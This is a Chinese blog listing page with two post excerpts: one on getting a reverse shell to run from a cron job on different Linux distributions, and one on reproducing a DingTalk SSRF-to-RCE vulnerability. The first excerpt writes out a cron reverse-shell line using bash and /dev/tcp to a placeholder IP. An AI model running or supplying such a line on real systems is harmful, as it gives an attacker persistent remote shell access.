2022年2月17日
反弹shell的一些东西
摘要: 反弹shell 格式问题 在写计划任务反弹shell的时候VPS如果是centos那么直接写 */1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1 但是在实际测试中debian和ubuntu系统这样写是执行不了的, 需要加上 bash -c " " */1 阅读全文
posted @ 2022-02-17 10:44 Erichas 阅读(171) 评论(0) 推荐(0) 编辑
钉钉从ssrf到rce
摘要: 前几天爆出来钉钉RCE的漏洞,说一下发现和复现过程 0x01 爱之初体验 最开始是发现可以ssrf,当时电脑上就有dingding 然后试了一下 dnslog有回显,可以去访问 这两个IP一查 都是阿里云的服务器 payload是这样的,发送到聊天窗口,服务器就会去解析 dingtalk://din 阅读全文
posted @ 2022-02-17 10:18 Erichas 阅读(448) 评论(2) 推荐(0) 编辑